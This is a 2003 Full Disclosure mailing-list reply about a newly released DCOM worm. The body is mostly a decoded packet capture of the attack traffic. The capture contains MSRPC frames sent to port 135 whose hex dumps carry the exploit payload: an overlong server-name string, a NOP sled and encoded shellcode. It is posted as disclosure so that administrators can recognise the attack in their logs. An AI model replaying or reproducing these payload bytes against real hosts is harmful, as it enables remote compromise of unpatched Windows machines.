Full Disclosure mailing list archives
RE: DCOM
From: "Jason Coombs" <jasonc () science org>
Date: Mon, 11 Aug 2003 10:17:11 -1000
Is this what you're seeing?
6 66.859375 BEFC20000500 XEROX 000000 MSRPC c/o RPC Bind: UUID
000001A0-0000-0000-C000-000000000046 call 0x7F assoc grp 0x0 xmit 0x16D0
recv 0x16D0 67.30.174.214 WIN2KDEV IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.405
Frame: Time delta from previous physical frame: 8687500 microseconds
Frame: Frame number: 6
Frame: Total frame length: 126 bytes
Frame: Capture frame length: 126 bytes
Frame: Frame data: Number of data bytes remaining = 126 (0x007E)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 126 (0x007E)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 112 (0x0070)
IP: ID = 0x1C04; Proto = TCP; Len: 112
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 112 (0x70)
IP: Identification = 7172 (0x1C04)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x0138
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 92 (0x005C)
TCP: .AP..., len: 72, seq:3551092873-3551092945, ack: 188699400, win: 8160,
src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551092873 (0xD3A96089)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0xC46A
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 72 (0x0048)
MSRPC: c/o RPC Bind: UUID 000001A0-0000-0000-C000-000000000046 call
0x7F assoc grp 0x0 xmit 0x16D0 recv 0x16D0
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Bind
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved
(AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent
multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute
guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call
semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the
optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 72 (0x48)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 127 (0x7F)
MSRPC: Max Trans Frag Size = 5840 (0x16D0)
MSRPC: Max Recv Frag Size = 5840 (0x16D0)
MSRPC: Assoc Group Identifier = 0 (0x0)
MSRPC: Presentation Context List
MSRPC: Number of Context Elements = 1 (0x1)
MSRPC: Presentation Context Identifier = 1 (0x1)
MSRPC: Number of Transfer Syntaxs = 1 (0x1)
MSRPC: Abstract Interface UUID = 000001A0-0000-0000-C000-000000000046
MSRPC: Abstract Interface Version = 0 (0x0)
MSRPC: Transfer Interface UUID = 8A885D04-1CEB-11C9-9FE8-08002B104860
MSRPC: Transfer Interface Version = 2 (0x2)
00000: 00 00 05 00 00 00 BE FC 20 00 05 00 08 00 45 00 ......¾ü .....E.
00010: 00 70 1C 04 40 00 7D 06 01 38 43 1E AE D6 43 1E .p..@.}..8C.®ÖC.
00020: AB 39 0F 03 00 87 D3 A9 60 89 0B 3F 53 08 50 18 «9...?Ó©`?.?S.P.
00030: 1F E0 C4 6A 00 00 05 00 0B 03 10 00 00 00 48 00 .àÄj..........H.
00040: 00 00 7F 00 00 00 D0 16 D0 16 00 00 00 00 01 00 .....Ð.Ð.......
00050: 00 00 01 00 01 00 A0 01 00 00 00 00 00 00 C0 00 ...... .......À.
00060: 00 00 00 00 00 46 00 00 00 00 04 5D 88 8A EB 1C .....F.....]??ë.
00070: C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 É.?è..+.H`....
7 66.859375 XEROX 000000 BEFC20000500 MSRPC c/o RPC Bind Ack: call 0x7F
assoc grp 0x90D9 xmit 0x16D0 recv 0x16D0 WIN2KDEV 67.30.174.214 IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.405
Frame: Time delta from previous physical frame: 0 microseconds
Frame: Frame number: 7
Frame: Total frame length: 114 bytes
Frame: Capture frame length: 114 bytes
Frame: Frame data: Number of data bytes remaining = 114 (0x0072)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : BEFC20000500
ETHERNET: .......0 = Individual address
ETHERNET: ......1. = Locally administered address
ETHERNET: Source address : 000005000000
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 114 (0x0072)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 100 (0x0064)
IP: ID = 0x1E94; Proto = TCP; Len: 100
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 100 (0x64)
IP: Identification = 7828 (0x1E94)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xFBB3
IP: Source Address = 67.30.171.57
IP: Destination Address = 67.30.174.214
IP: Data: Number of data bytes remaining = 80 (0x0050)
TCP: .AP..., len: 60, seq: 188699400-188699460, ack:3551092945, win: 8088,
src: 135 dst: 3843
TCP: Source Port = Location Service
TCP: Destination Port = 0x0F03
TCP: Sequence Number = 188699400 (0xB3F5308)
TCP: Acknowledgement Number = 3551092945 (0xD3A960D1)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8088 (0x1F98)
TCP: Checksum = 0xEDFA
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 60 (0x003C)
MSRPC: c/o RPC Bind Ack: call 0x7F assoc grp 0x90D9 xmit 0x16D0 recv
0x16D0
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Bind Ack
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved
(AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent
multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute
guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call
semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the
optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 60 (0x3C)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 127 (0x7F)
MSRPC: Max Trans Frag Size = 5840 (0x16D0)
MSRPC: Max Recv Frag Size = 5840 (0x16D0)
MSRPC: Assoc Group Identifier = 37081 (0x90D9)
MSRPC: Secondary Address
MSRPC: Secondary Address Length = 4 (0x4)
MSRPC: Secondary Address Port
MSRPC: Padding Byte(s)
MSRPC: Result List
MSRPC: Number of Results = 1 (0x1)
MSRPC: Reserved = 0 (0x0)
MSRPC: Reserved 2
MSRPC: Presentation Context Results
MSRPC: Result = Acceptance
MSRPC: Reason = Reason not specified
MSRPC: Transfer Syntax
MSRPC: Transfer Interface UUID =
8A885D04-1CEB-11C9-9FE8-08002B104860
MSRPC: Transfer Interface Version = 2 (0x2)
00000: BE FC 20 00 05 00 00 00 05 00 00 00 08 00 45 00 ¾ü ...........E.
00010: 00 64 1E 94 40 00 80 06 FB B3 43 1E AB 39 43 1E .d.?@.?.û³C.«9C.
00020: AE D6 00 87 0F 03 0B 3F 53 08 D3 A9 60 D1 50 18 ®Ö.?...?S.Ó©`ÑP.
00030: 1F 98 ED FA 00 00 05 00 0C 03 10 00 00 00 3C 00 .?íú..........<.
00040: 00 00 7F 00 00 00 D0 16 D0 16 D9 90 00 00 04 00 .....Ð.Ð.Ù....
00050: 31 33 35 00 00 00 01 00 00 00 00 00 00 00 04 5D 135............]
00060: 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 ??ë.É.?è..+.H`..
00070: 00 00 ..
8 67.281250 BEFC20000500 XEROX 000000 MSRPC c/o RPC Request: call 0xE5
opnum 0x4 context 0x1 hint 0x690 67.30.174.214 WIN2KDEV IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.827
Frame: Time delta from previous physical frame: 421875 microseconds
Frame: Frame number: 8
Frame: Total frame length: 1414 bytes
Frame: Capture frame length: 1414 bytes
Frame: Frame data: Number of data bytes remaining = 1414 (0x0586)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 1414 (0x0586)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 1400 (0x0578)
IP: ID = 0x1C05; Proto = TCP; Len: 1400
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 1400 (0x578)
IP: Identification = 7173 (0x1C05)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xFC2E
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 1380 (0x0564)
TCP: .A...., len: 1360, seq:3551092945-3551094305, ack: 188699400, win: 8160,
src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551092945 (0xD3A960D1)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x10 : .A....
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....0... = No Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0x9219
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 1360 (0x0550)
MSRPC: c/o RPC Request: call 0xE5 opnum 0x4 context 0x1 hint 0x690
MSRPC: Version = 5 (0x5)
MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Request
MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved
(AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent
multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute
guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call
semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the
optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 1704 (0x6A8)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 229 (0xE5)
MSRPC: Bind Frame Number = 6 (0x6)
MSRPC: Abstract Interface UUID = 000001A0-0000-0000-C000-000000000046
MSRPC: Allocation Hint = 1680 (0x690)
MSRPC: Presentation Context Identifier = 1 (0x1)
MSRPC: Operation Number (c/o Request prop. dg header prop) = 4 (0x4)
MSRPC: Stub Data
00000: 00 00 05 00 00 00 BE FC 20 00 05 00 08 00 45 00 ......¾ü .....E.
00010: 05 78 1C 05 40 00 7D 06 FC 2E 43 1E AE D6 43 1E .x..@.}.ü.C.®ÖC.
00020: AB 39 0F 03 00 87 D3 A9 60 D1 0B 3F 53 08 50 10 «9...?Ó©`Ñ.?S.P.
00030: 1F E0 92 19 00 00 05 00 00 03 10 00 00 00 A8 06 .à?...........¨.
00040: 00 00 E5 00 00 00 90 06 00 00 01 00 04 00 05 00 ..å............
00050: 06 00 01 00 00 00 00 00 00 00 32 24 58 FD CC 45 ..........2$XýÌE
00060: 64 49 B0 70 DD AE 74 2C 96 D2 60 5E 0D 00 01 00 dI°pÝ®t,?Ò`^....
00070: 00 00 00 00 00 00 70 5E 0D 00 02 00 00 00 7C 5E ......p^......|^
00080: 0D 00 00 00 00 00 10 00 00 00 80 96 F1 F1 2A 4D ..........??ññ*M
00090: CE 11 A6 6A 00 20 AF 6E 72 F4 0C 00 00 00 4D 41 Î.¦j. ¯nrô....MA
000A0: 52 42 01 00 00 00 00 00 00 00 0D F0 AD BA 00 00 RB.........ðº..
000B0: 00 00 A8 F4 0B 00 20 06 00 00 20 06 00 00 4D 45 ..¨ô.. ... ...ME
000C0: 4F 57 04 00 00 00 A2 01 00 00 00 00 00 00 C0 00 OW....¢.......À.
000D0: 00 00 00 00 00 46 38 03 00 00 00 00 00 00 C0 00 .....F8.......À.
000E0: 00 00 00 00 00 46 00 00 00 00 F0 05 00 00 E8 05 .....F....ð...è.
000F0: 00 00 00 00 00 00 01 10 08 00 CC CC CC CC C8 00 ..........ÌÌÌÌÈ.
00100: 00 00 4D 45 4F 57 E8 05 00 00 D8 00 00 00 00 00 ..MEOWè...Ø.....
00110: 00 00 02 00 00 00 07 00 00 00 00 00 00 00 00 00 ................
00120: 00 00 00 00 00 00 00 00 00 00 C4 28 CD 00 64 29 ..........Ä(Í.d)
00130: CD 00 00 00 00 00 07 00 00 00 B9 01 00 00 00 00 Í.........¹.....
00140: 00 00 C0 00 00 00 00 00 00 46 AB 01 00 00 00 00 ..À......F«.....
00150: 00 00 C0 00 00 00 00 00 00 46 A5 01 00 00 00 00 ..À......F¥.....
00160: 00 00 C0 00 00 00 00 00 00 46 A6 01 00 00 00 00 ..À......F¦.....
00170: 00 00 C0 00 00 00 00 00 00 46 A4 01 00 00 00 00 ..À......F¤.....
00180: 00 00 C0 00 00 00 00 00 00 46 AD 01 00 00 00 00 ..À......F.....
00190: 00 00 C0 00 00 00 00 00 00 46 AA 01 00 00 00 00 ..À......Fª.....
001A0: 00 00 C0 00 00 00 00 00 00 46 07 00 00 00 60 00 ..À......F....`.
001B0: 00 00 58 00 00 00 90 00 00 00 40 00 00 00 20 00 ..X......@... .
001C0: 00 00 38 03 00 00 30 00 00 00 01 00 00 00 01 10 ..8...0.........
001D0: 08 00 CC CC CC CC 50 00 00 00 4F B6 88 20 FF FF ..ÌÌÌÌP...O¶? ÿÿ
001E0: FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ÿÿ..............
001F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 10 ................
00230: 08 00 CC CC CC CC 48 00 00 00 07 00 66 00 06 09 ..ÌÌÌÌH.....f...
00240: 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 10 00 ......À......F..
00250: 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 ................
00260: 00 00 78 19 0C 00 58 00 00 00 05 00 06 00 01 00 ..x...X.........
00270: 00 00 70 D8 98 93 98 4F D2 11 A9 3D BE 57 B2 00 ..pØ???OÒ.©=¾W².
00280: 00 00 32 00 31 00 01 10 08 00 CC CC CC CC 80 00 ..2.1.....ÌÌÌÌ?.
00290: 00 00 0D F0 AD BA 00 00 00 00 00 00 00 00 00 00 ...ðº..........
002A0: 00 00 00 00 00 00 18 43 14 00 00 00 00 00 60 00 .......C......`.
002B0: 00 00 60 00 00 00 4D 45 4F 57 04 00 00 00 C0 01 ..`...MEOW....À.
002C0: 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 3B 03 ......À......F;.
002D0: 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 00 00 ......À......F..
002E0: 00 00 30 00 00 00 01 00 01 00 81 C5 17 03 80 0E ..0.......Å..?.
002F0: E9 4A 99 99 F1 8A 50 6F 7A 85 02 00 00 00 00 00 éJ??ñ?Poz?......
00300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00310: 00 00 01 00 00 00 01 10 08 00 CC CC CC CC 30 00 ..........ÌÌÌÌ0.
00320: 00 00 78 00 6E 00 00 00 00 00 D8 DA 0D 00 00 00 ..x.n.....ØÚ....
00330: 00 00 00 00 00 00 20 2F 0C 00 00 00 00 00 00 00 ...... /........
00340: 00 00 03 00 00 00 00 00 00 00 03 00 00 00 46 00 ..............F.
00350: 58 00 00 00 00 00 01 10 08 00 CC CC CC CC 10 00 X.........ÌÌÌÌ..
00360: 00 00 30 00 2E 00 00 00 00 00 00 00 00 00 00 00 ..0.............
00370: 00 00 00 00 00 00 01 10 08 00 CC CC CC CC 68 00 ..........ÌÌÌÌh.
00380: 00 00 0E 00 FF FF 68 8B 0B 00 02 00 00 00 00 00 ....ÿÿh?........
00390: 00 00 00 00 00 00 86 01 00 00 00 00 00 00 86 01 ......?.......?.
003A0: 00 00 5C 00 5C 00 46 00 58 00 4E 00 42 00 46 00 ..\.\.F.X.N.B.F.
003B0: 58 00 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 X.F.X.N.B.F.X.F.
003C0: 58 00 46 00 58 00 46 00 58 00 9D 13 00 01 CC E0 X.F.X.F.X....Ìà
003D0: FD 7F CC E0 FD 7F 90 90 90 90 90 90 90 90 90 90 ýÌàý
003E0: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
003F0: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00400: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00410: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00420: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00430: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00440: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00450: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00460: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
00470: 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 19 5E ë.^
00480: 31 C9 81 E9 89 FF FF FF 81 36 80 BF 32 94 81 EE 1Éé?ÿÿÿ6?¿2?î
00490: FC FF FF FF E2 F2 EB 05 E8 E2 FF FF FF 03 53 06 üÿÿÿâòë.èâÿÿÿ.S.
004A0: 1F 74 57 75 95 80 BF BB 92 7F 89 5A 1A CE B1 DE .tWu??¿»??Z.αÞ
004B0: 7C E1 BE 32 94 09 F9 3A 6B B6 D7 9F 4D 85 71 DA |á¾2?.ù:k¶×?M?qÚ
004C0: C6 81 BF 32 1D C6 B3 5A F8 EC BF 32 FC B3 8D 1C Æ¿2.ƳZøì¿2ü³.
004D0: F0 E8 C8 41 A6 DF EB CD C2 88 36 74 90 7F 89 5A ðèÈA¦ßëÍÂ?6t?Z
004E0: E6 7E 0C 24 7C AD BE 32 94 09 F9 22 6B B6 D7 4C æ~.$|¾2?.ù"k¶×L
004F0: 4C 62 CC DA 8A 81 BF 32 1D C6 AB CD E2 84 D7 F9 LbÌÚ?¿2.Æ«Íâ?×ù
00500: 79 7C 84 DA 9A 81 BF 32 1D C6 A7 CD E2 84 D7 EB y|?Ú?¿2.ƧÍâ?×ë
00510: 9D 75 12 DA 6A 80 BF 32 1D C6 A3 CD E2 84 D7 96 u.Új?¿2.Æ£Íâ?×?
00520: 8E F0 78 DA 7A 80 BF 32 1D C6 9F CD E2 84 D7 96 ?ðxÚz?¿2.Æ?Íâ?×?
00530: 39 AE 56 DA 4A 80 BF 32 1D C6 9B CD E2 84 D7 D7 9®VÚJ?¿2.Æ?Íâ?××
00540: DD 06 F6 DA 5A 80 BF 32 1D C6 97 CD E2 84 D7 D5 Ý.öÚZ?¿2.Æ?Íâ?×Õ
00550: ED 46 C6 DA 2A 80 BF 32 1D C6 93 01 6B 01 53 A2 íFÆÚ*?¿2.Æ?.k.S¢
00560: 95 80 BF 66 FC 81 BE 32 94 7F E9 2A C4 D0 EF 62 ??¿fü¾2?é*ÄÐïb
00570: D4 D0 FF 62 6B D6 A3 B9 4C D7 E8 5A 96 80 AE 6E ÔÐÿbkÖ£¹L×èZ??®n
00580: 1F 4C D5 24 C5 D3 .LÕ$ÅÓ
9 67.390625 BEFC20000500 XEROX 000000 TCP .AP..., len: 344,
seq:3551094305-3551094649, ack: 188699400, win: 8160, src: 3843 dst: 135
67.30.174.214 WIN2KDEV IP
Frame: Base frame properties
Frame: Time of capture = 8/11/2003 9:25:11.936
Frame: Time delta from previous physical frame: 109375 microseconds
Frame: Frame number: 9
Frame: Total frame length: 398 bytes
Frame: Capture frame length: 398 bytes
Frame: Frame data: Number of data bytes remaining = 398 (0x018E)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 000005000000
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : BEFC20000500
ETHERNET: .......0 = No routing information present
ETHERNET: ......1. = Locally administered address
ETHERNET: Frame Length : 398 (0x018E)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 384 (0x0180)
IP: ID = 0x1C06; Proto = TCP; Len: 384
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Precedence = Routine
IP: Type of Service = Normal Service
IP: Total Length = 384 (0x180)
IP: Identification = 7174 (0x1C06)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 125 (0x7D)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0x0026
IP: Source Address = 67.30.174.214
IP: Destination Address = 67.30.171.57
IP: Data: Number of data bytes remaining = 364 (0x016C)
TCP: .AP..., len: 344, seq:3551094305-3551094649, ack: 188699400, win: 8160,
src: 3843 dst: 135
TCP: Source Port = 0x0F03
TCP: Destination Port = Location Service
TCP: Sequence Number = 3551094305 (0xD3A96621)
TCP: Acknowledgement Number = 188699400 (0xB3F5308)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8160 (0x1FE0)
TCP: Checksum = 0xDBD3
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 344 (0x0158)
00000: 00 00 05 00 00 00 BE FC 20 00 05 00 08 00 45 00 ......¾ü .....E.
00010: 01 80 1C 06 40 00 7D 06 00 26 43 1E AE D6 43 1E .?..@.}..&C.®ÖC.
00020: AB 39 0F 03 00 87 D3 A9 66 21 0B 3F 53 08 50 18 «9...?Ó©f!.?S.P.
00030: 1F E0 DB D3 00 00 40 64 B4 D7 EC CD C2 A4 E8 63 .àÛÓ..@d´×ìͤèc
00040: C7 7F E9 1A 1F 50 D7 57 EC E5 BF 5A F7 ED DB 1C Çé..P×Wìå¿Z÷íÛ.
00050: 1D E6 8F B1 78 D4 32 0E B0 B3 7F 01 5D 03 7E 27 .æ±xÔ2.°³.].~'
00060: 3F 62 42 F4 D0 A4 AF 76 6A C4 9B 0F 1D D4 9B 7A ?bBôФ¯vjÄ?..Ô?z
00070: 1D D4 9B 7E 1D D4 9B 62 19 C4 9B 22 C0 D0 EE 63 .Ô?~.Ô?b.Ä?"ÀÐîc
00080: C5 EA BE 63 C5 7F C9 02 C5 7F E9 22 1F 4C D5 CD Åê¾cÅÉ.Åé".LÕÍ
00090: 6B B1 40 64 98 0B 77 65 6B D6 93 CD C2 94 EA 64 k±@d?.wekÖ?ÍÂ?êd
000A0: F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E ð!2??:òì?4r?.Ï.
000B0: 39 0B D7 3A 7F 89 34 72 A0 0B 17 8A 94 80 BF B9 9.×:?4r ..???¿¹
000C0: 51 DE E2 F0 90 80 EC 67 C2 D7 34 5E B0 98 34 77 QÞâð?ìgÂ×4^°?4w
000D0: A8 0B EB 37 EC 83 6A B9 DE 98 34 68 B4 83 62 D1 ¨.ë7ì?j¹Þ?4h´?bÑ
000E0: A6 C9 34 06 1F 83 4A 01 6B 7C 8C F2 38 BA 7B 46 ¦É4..?J.k|?ò8º{F
000F0: 93 41 70 3F 97 78 54 C0 AF FC 9B 26 E1 61 34 68 ?Ap??xTÀ¯ü?&áa4h
00100: B0 83 62 54 1F 8C F4 B9 CE 9C BC EF 1F 84 34 31 °?bT.?ô¹Î?¼ï.?41
00110: 51 6B BD 01 54 0B 6A 6D CA DD E4 F0 90 80 2F A2 Qk½.T.jmÊÝäð?/¢
00120: 04 00 5C 00 43 00 24 00 5C 00 31 00 32 00 33 00 ..\.C.$.\.1.2.3.
00130: 34 00 35 00 36 00 31 00 31 00 31 00 31 00 31 00 4.5.6.1.1.1.1.1.
00140: 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
00150: 31 00 31 00 2E 00 64 00 6F 00 63 00 00 00 01 10 1.1...d.o.c.....
00160: 08 00 CC CC CC CC 20 00 00 00 30 00 2D 00 00 00 ..ÌÌÌÌ ...0.-...
00170: 00 00 88 2A 0C 00 02 00 00 00 01 00 00 00 28 8C ..?*..........(?
00180: 0C 00 01 00 00 00 07 00 00 00 00 00 00 00 ..............
-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com]On Behalf Of Paul Marsh
Sent: Monday, August 11, 2003 8:56 AM
To: Full-Disclosure (E-mail)
Subject: [Full-disclosure] DCOM
Looks like a worm has been released, check your logs.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- DCOM Paul Marsh (Aug 11)
- <Possible follow-ups>
- DCOM Paul Marsh (Aug 11)
- DCOM Worm released Joey (Aug 11)
- Re: DCOM Worm released Dennis Opacki (Aug 11)
- Re: DCOM Worm released Dennis Opacki (Aug 11)
- Re: DCOM Worm released Jordan Wiens (Aug 11)
- RE: DCOM Worm released Marc Maiffret (Aug 11)
- Re: DCOM Worm released daniel uriah clemens (Aug 11)
- RE: DCOM Worm released gml (Aug 11)
- DCOM Worm released Joey (Aug 11)
- Re: DCOM Worm released Nils (Aug 11)